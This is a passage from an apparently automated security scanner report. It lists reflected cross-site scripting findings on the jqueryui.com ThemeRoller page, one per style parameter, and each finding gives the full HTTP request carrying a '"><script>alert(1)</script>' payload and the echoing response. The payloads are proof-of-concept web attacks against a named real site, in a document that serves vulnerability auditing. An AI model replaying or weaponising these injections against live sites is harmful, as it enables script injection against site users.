ureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75c9d15"><script>alert(1)</script>a4b6ff2924a&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

1.126. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f342"><script>alert(1)</script>04fea7ef422 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=953f342"><script>alert(1)</script>04fea7ef422&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=953f342"><script>alert(1)</script>04fea7ef422&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

1.127. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ceca"><script>alert(1)</script>c193cb4b460 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=759ceca"><script>alert(1)</script>c193cb4b460&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=759ceca"><script>alert(1)</script>c193cb4b460&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

1.128. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3f10"><script>alert(1)</script>67e88ebfbd was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55a3f10"><script>alert(1)</script>67e88ebfbd&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55a3f10"><script>alert(1)</script>67e88ebfbd&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

1.129. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a63d"><script>alert(1)</script>4a44203b28e was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=753a63d"><script>alert(1)</script>4a44203b28e&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=753a63d"><script>alert(1)</script>4a44203b28e&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

1.130. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93f4d"><script>alert(1)</script>713c33ea2ff was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=093f4d"><script>alert(1)</script>713c33ea2ff&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=093f4d"><script>alert(1)</script>713c33ea2ff&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

1.131. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1583f"><script>alert(1)</script>671ff3b070b was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=01583f"><script>alert(1)</script>671ff3b070b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=01583f"><script>alert(1)</script>671ff3b070b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.132. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d09d8"><script>alert(1)</script>0a734e37c76 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngd09d8"><script>alert(1)</script>0a734e37c76&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngd09d8"><script>alert(1)</script>0a734e37c76&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

1.133. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22462"><script>alert(1)</script>158eccff51d was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png22462"><script>alert(1)</script>158eccff51d&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png22462"><script>alert(1)</script>158eccff51d&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

1.134. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18966"><script>alert(1)</script>76f50b8c74f was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png18966"><script>alert(1)</script>76f50b8c74f&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
